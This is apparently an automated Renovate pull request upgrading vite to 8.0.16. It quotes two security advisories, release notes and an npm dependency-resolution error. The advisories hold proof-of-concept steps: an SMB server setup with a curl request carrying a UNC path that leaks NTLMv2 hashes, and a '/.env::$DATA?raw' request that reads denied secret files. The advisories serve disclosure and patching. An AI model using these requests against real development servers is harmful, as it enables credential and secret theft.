Update dependency vite to v8.0.16 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vite (source)	8.0.13 → 8.0.16
vite (source)	8.0.8 → 8.0.16

---

launch-editor: NTLMv2 hash disclosure via UNC path handling on Windows

CVE-2026-53632 / GHSA-v6wh-96g9-6wx3

More information

Details

Summary

The launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.

Impact

If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the launch-editor:

• using Windows
• NTLM is not disabled (it is recommended to disable, while it's still enabled by default)
• the user accesses the attackers website that sends request to a middleware using launch-editor
• the server that has the middleware using launch-editor is running
• the attacker knows the URL for that server and the middleware

This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.

Details

launch-editor accepts file paths without validating or restricting Windows UNC paths such as:

\\attacker-host\share

On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.

If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password.

The attacker could target a developer that uses a development server using launch-editor to develop code locally, send them a link and grab their NTLMv2 hash.

PoC

From the attacker side, we will setup an SMB server. I personally used Impacket's smbserver.py, but you could use something like Responder for this as well. For keeping it simple, we will use smbserver.py here.

First, let's create a directory to serve as an SMB share.

mkdir /tmp/data
echo "Hello world" > /tmp/data/test.txt

Then, start the SMB server.

$ sudo smbserver.py -smb2support -debug share /tmp/data

Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally (vite).

Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use curl to achieve the same.

curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'

Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of smbserver.py and see the NTLMv2 hash coming in.

Severity

• CVSS Score: 5.5 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H

References

• https://github.com/vitejs/launch-editor/security/advisories/GHSA-v6wh-96g9-6wx3
• https://github.com/advisories/GHSA-v6wh-96g9-6wx3

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

vite: server.fs.deny bypass on Windows alternate paths

CVE-2026-53571 / GHSA-fx2h-pf6j-xcff

More information

Details

Summary

The contents of files that are specified by server.fs.deny can be returned to the browser on Windows.

Impact

Only apps that match the following conditions are affected:

• explicitly exposes the Vite dev server to the network (using --host or server.host config option)
• the sensitive file exists in the allowed directories specified by server.fs.allow
• either of:
  • the sensitive file exists in an NTFS volume
  • the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes)

Details

Vite’s dev server denies direct access to sensitive files through server.fs.deny, including entries such as .env, .env.*, and *.{crt,pem}. However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied.
Because of this, requests such as /.env::$DATA?raw are treated as allowed paths, while Windows resolves them to the original file's default data stream.

Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

Access via browser at http://localhost:5173/.env::$DATA?raw

Example expected result:

• /.env::$DATA?raw returns the contents of .env
• /tls.pem::$DATA?raw returns the contents of tls.pem

Severity

• CVSS Score: 8.2 / 10 (High)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/vitejs/vite/security/advisories/GHSA-fx2h-pf6j-xcff
• https://github.com/advisories/GHSA-fx2h-pf6j-xcff

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

vitejs/vite (vite)

v8.0.16

Compare Source

Bug Fixes

• deps: reject UNC paths for launch-editor-middleware (#​22571) (50b9512)
• reject windows alternate paths (#​22572) (dc245c7)

v8.0.15

Compare Source

Features

• send 408 on request timeout (#​22476) (c85c9ee)
• update rolldown to 1.0.3 (#​22538) (646dbed)

Bug Fixes

• capitalize error messages and remove spurious space in parse error (#​22488) (85a0eff)
• deps: update all non-major dependencies (#​22511) (2686d7d)
• dev: fix html-proxy cache key mismatch for /@​fs/ HTML paths (#​21762) (47c4213)
• glob: error on relative glob in virtual module when no files match (#​22497) (5c8e98f)
• optimizer: close the rolldown bundle when write() rejects (#​22528) (e3cfb9d)
• resolve: provide onWarn for viteResolvePlugin in JS plugin containers (#​22509) (40985f1)

Miscellaneous Chores

• deps: update rolldown-related dependencies (#​22566) (3052a67)

Code Refactoring

• correct logic in collectAllModules function (#​22562) (6978a9c)

v8.0.14

Compare Source

Features

• update rolldown to 1.0.2 (#​22484) (96efc88)

Bug Fixes

• deps: update all non-major dependencies (#​22471) (98b8163)
• dev: handle errors when sending messages to vite server (#​22450) (e8e9a34)
• html: handle trailing slash paths in transformIndexHtml (#​22480) (5d94d1b)
• optimizer: pass oxc jsx options to transformSync in dependency scan (#​22342) (b3132da)

Miscellaneous Chores

• deps: update rolldown-related dependencies (#​22470) (7cb728e)
• remove irrelevant commits from changelog (2c69495)

Code Refactoring

• glob: do not rewrite import path for absolute base (#​22310) (0ae2844)

Tests

• css: sass does not use main field (#​22449) (ebf39a0)

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • At any time (no schedule defined)
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: package-lock.json

npm warn Unknown env config "store". This will stop working in the next major version of npm. See `npm help npmrc` for supported config options.
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: @codecov/vite-plugin@2.0.1
npm error Found: vite@8.0.16
npm error node_modules/vite
npm error   vite@"8.0.16" from the root project
npm error   peer vite@"^3.0.0 || ^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0" from @joshwooding/vite-plugin-react-docgen-typescript@0.7.0
npm error   node_modules/@joshwooding/vite-plugin-react-docgen-typescript
npm error     @joshwooding/vite-plugin-react-docgen-typescript@"^0.7.0" from @storybook/react-vite@10.4.0
npm error     node_modules/@storybook/react-vite
npm error       @storybook/react-vite@"10.4.0" from @storybook/nextjs-vite@10.4.0
npm error       node_modules/@storybook/nextjs-vite
npm error         dev @storybook/nextjs-vite@"^10.4.0" from @kit-data-manager/nextjs-pid-component-demo@0.4.2
npm error         packages/nextjs-app
npm error       1 more (@kit-data-manager/react-pid-component)
npm error   17 more (@storybook/builder-vite, @storybook/csf-plugin, ...)
npm error
npm error Could not resolve dependency:
npm error peer vite@"4.x || 5.x || 6.x" from @codecov/vite-plugin@2.0.1
npm error node_modules/@codecov/vite-plugin
npm error   dev @codecov/vite-plugin@"^2.0.1" from @kit-data-manager/react-pid-component@0.4.2
npm error   packages/react-library
npm error     @kit-data-manager/react-pid-component@0.4.2
npm error     node_modules/@kit-data-manager/react-pid-component
npm error       workspace packages/react-library from the root project
npm error       1 more (@kit-data-manager/nextjs-pid-component-demo)
npm error   dev @codecov/vite-plugin@"^2.0.1" from @kit-data-manager/vue-pid-component@0.4.2
npm error   packages/vue-library
npm error     @kit-data-manager/vue-pid-component@0.4.0
npm error     node_modules/@kit-data-manager/vue-pid-component
npm error       workspace packages/vue-library from the root project
npm error
npm error Conflicting peer dependency: vite@6.4.3
npm error node_modules/vite
npm error   peer vite@"4.x || 5.x || 6.x" from @codecov/vite-plugin@2.0.1
npm error   node_modules/@codecov/vite-plugin
npm error     dev @codecov/vite-plugin@"^2.0.1" from @kit-data-manager/react-pid-component@0.4.2
npm error     packages/react-library
npm error       @kit-data-manager/react-pid-component@0.4.2
npm error       node_modules/@kit-data-manager/react-pid-component
npm error         workspace packages/react-library from the root project
npm error         1 more (@kit-data-manager/nextjs-pid-component-demo)
npm error     dev @codecov/vite-plugin@"^2.0.1" from @kit-data-manager/vue-pid-component@0.4.2
npm error     packages/vue-library
npm error       @kit-data-manager/vue-pid-component@0.4.0
npm error       node_modules/@kit-data-manager/vue-pid-component
npm error         workspace packages/vue-library from the root project
npm error
npm error Fix the upstream dependency conflict, or retry this command with --force or --legacy-peer-deps to accept an incorrect (and potentially broken) dependency resolution.
npm error
npm error
npm error For a full report see:
npm error /runner/cache/others/npm/_logs/2026-06-16T01_45_29_126Z-eresolve-report.txt
npm error A complete log of this run can be found in: /runner/cache/others/npm/_logs/2026-06-16T01_45_29_126Z-debug-0.log

[github-actions]

🎨 Chromatic Visual Tests

✅ No visual changes

Review

View in Chromatic

Chromatic provides automated visual testing and review for component changes.

[codecov]

⚠️ JUnit XML file not found

The CLI was unable to find any JUnit XML files to upload.
For more help, visit our troubleshooting guide.

[github-actions]

Test Results

Coverage Summary

Node	Lines	Statements	Branches	Functions

Coverage & Quality Reports

📊 Codecov Report
🎨 Chromatic Status

---

For more details, check the workflow run